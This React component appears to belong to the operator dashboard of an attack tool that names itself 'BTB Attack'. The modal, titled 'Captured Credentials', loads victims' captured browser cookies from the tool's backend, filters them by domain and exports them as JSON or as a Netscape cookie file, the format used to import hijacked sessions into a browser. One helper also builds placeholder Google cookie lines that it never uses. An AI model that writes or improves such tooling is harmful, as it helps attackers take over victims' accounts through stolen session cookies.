import { useState, useEffect, useMemo } from "react";
import { createPortal } from "react-dom";
import axios from "axios";
import authHeaders from "../utils/authHeaders";
import { useToast } from "../context/ToastContext";

const BASE = import.meta.env.VITE_API_URL || "";

function NavIcon({ name, className = "w-4 h-4" }) {
  const icons = {
    key: (
      <svg className={className} fill="none" stroke="currentColor" viewBox="0 0 24 24">
        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M15 7a2 2 0 012 2m4 0a6 6 0 01-7.743 5.743L11 17H9v2H7v2H4a1 1 0 01-1-1v-2.586a1 1 0 01.293-.707l5.964-5.964A6 6 0 1121 9z" />
      </svg>
    ),
    cookie: (
      <svg className={className} fill="none" stroke="currentColor" viewBox="0 0 24 24">
        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15" />
      </svg>
    ),
  };
  return icons[name] || null;
}

function toNetscapeFormat(cookies) {
  const lines = ["# Netscape HTTP Cookie File", "# This file was generated by BTB Attack"];
  lines.push(".google.com\tTRUE\t/\tTRUE\t0\tAPISID\t" + "placeholder");
  lines.push(".google.com\tTRUE\t/\tTRUE\t0\tHSID\t" + "placeholder");
  lines.push(".google.com\tTRUE\t/\tTRUE\t0\tSID\t" + "placeholder");

  const netscapeCookies = [];
  for (const cookie of cookies) {
    const domain = cookie.domain?.startsWith(".") ? "TRUE" : "FALSE";
    const secure = cookie.secure ? "TRUE" : "FALSE";
    const expiry = cookie.expirationDate || 0;
    const path = cookie.path || "/";
    netscapeCookies.push(
      `${cookie.domain}\t${domain}\t${path}\t${secure}\t${expiry}\t${cookie.name}\t${cookie.value}`
    );
  }

  return "# Netscape HTTP Cookie File\n" +
    "# This file was generated by BTB Attack\n\n" +
    netscapeCookies.join("\n");
}

export default function CredentialsModal({ onClose }) {
  const { addToast } = useToast();
  const [credentials, setCredentials] = useState([]);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState("");
  const [copied, setCopied] = useState(false);
  const [filterDomain, setFilterDomain] = useState("all");
  const [exportFormat, setExportFormat] = useState("json");

  useEffect(() => {
    fetchCredentials();
  }, []);

  async function fetchCredentials() {
    setLoading(true);
    setError("");
    try {
      const res = await axios.get(`${BASE}/api/credentials`, {
        headers: authHeaders(),
      });
      const message = res.data.message || "";
      const containerMatch = message.match(/^([^\n]+)\n([\s\S]*)$/);
      if (containerMatch) {
        const cookieData = containerMatch[2].trim();
        try {
          const parsed = JSON.parse(cookieData);
          setCredentials(Array.isArray(parsed) ? parsed : []);
        } catch {
          setCredentials([]);
        }
      } else {
        setCredentials([]);
      }
    } catch (err) {
      setError(err.response?.data?.message || err.message || "Failed to fetch credentials");
    } finally {
      setLoading(false);
    }
  }

  const domains = useMemo(() => {
    const domainSet = new Set(credentials.map(c => c.domain).filter(Boolean));
    return Array.from(domainSet).sort();
  }, [credentials]);

  const filteredCredentials = useMemo(() => {
    if (filterDomain === "all") return credentials;
    return credentials.filter(c => c.domain === filterDomain);
  }, [credentials, filterDomain]);

  function handleCopy() {
    const data = exportFormat === "netscape"
      ? toNetscapeFormat(filteredCredentials)
      : JSON.stringify(filteredCredentials, null, 2);
    navigator.clipboard.writeText(data).then(() => {
      setCopied(true);
      addToast(exportFormat === "netscape" ? "Netscape format copied!" : "JSON copied!", "success");
      setTimeout(() => setCopied(false), 2000);
    });
  }

  return createPortal(
    <div className="fixed inset-0 z-50 bg-black/70 flex items-center justify-center p-4" onClick={onClose}>
      <div
        className="bg-gray-900 border border-gray-700 rounded-lg w-full max-w-4xl max-h-[90vh] flex flex-col"
        onClick={(e) => e.stopPropagation()}
      >
        <div className="flex items-center justify-between px-4 py-3 border-b border-gray-800 shrink-0">
          <div className="flex items-center gap-3">
            <h2 className="text-sm font-bold text-yellow-300 flex items-center gap-2">
              <NavIcon name="key" className="w-4 h-4" />
              Captured Credentials
            </h2>
            <span className="text-xs text-gray-500">
              {filteredCredentials.length} / {credentials.length} cookies
            </span>
          </div>
          <div className="flex items-center gap-2">
            <select
              value={filterDomain}
              onChange={(e) => setFilterDomain(e.target.value)}
              className="bg-gray-800 border border-gray-700 rounded px-2 py-1 text-xs text-gray-300 focus:outline-none focus:border-green-500"
            >
              <option value="all">All domains</option>
              {domains.map(d => (
                <option key={d} value={d}>{d}</option>
              ))}
            </select>
            <select
              value={exportFormat}
              onChange={(e) => setExportFormat(e.target.value)}
              className="bg-gray-800 border border-gray-700 rounded px-2 py-1 text-xs text-gray-300 focus:outline-none focus:border-green-500"
            >
              <option value="json">JSON</option>
              <option value="netscape">Netscape</option>
            </select>
            <button
              onClick={handleCopy}
              disabled={credentials.length === 0 || loading}
              className="px-3 py-1.5 text-xs rounded bg-green-700 text-green-200 hover:bg-green-600 transition disabled:opacity-40"
            >
              {copied ? "Copied!" : "Copy All"}
            </button>
            <button
              onClick={onClose}
              className="text-gray-500 hover:text-red-400 text-lg leading-none"
            >
              ×
            </button>
          </div>
        </div>

        <div className="flex-1 overflow-y-auto p-4">
          {loading ? (
            <div className="flex items-center justify-center py-12">
              <div className="text-gray-500 text-sm">Loading...</div>
            </div>
          ) : error ? (
            <div className="flex items-center justify-center py-12">
              <div className="text-red-400 text-sm">{error}</div>
            </div>
          ) : credentials.length === 0 ? (
              <div className="flex flex-col items-center justify-center py-12 text-gray-500 text-sm">
                <NavIcon name="cookie" className="w-12 h-12 mb-2 text-gray-600" />
                <span>No cookies captured yet</span>
              </div>
          ) : filteredCredentials.length === 0 ? (
            <div className="flex flex-col items-center justify-center py-12 text-gray-500 text-sm">
              <span>No cookies for selected domain</span>
            </div>
          ) : (
            <pre className="text-xs text-green-300 whitespace-pre-wrap break-all font-mono bg-gray-950 p-3 rounded border border-gray-800 max-h-[60vh] overflow-y-auto">
              {exportFormat === "netscape"
                ? toNetscapeFormat(filteredCredentials)
                : JSON.stringify(filteredCredentials, null, 2)
              }
            </pre>
          )}
        </div>
      </div>
    </div>,
    document.body
  );
}
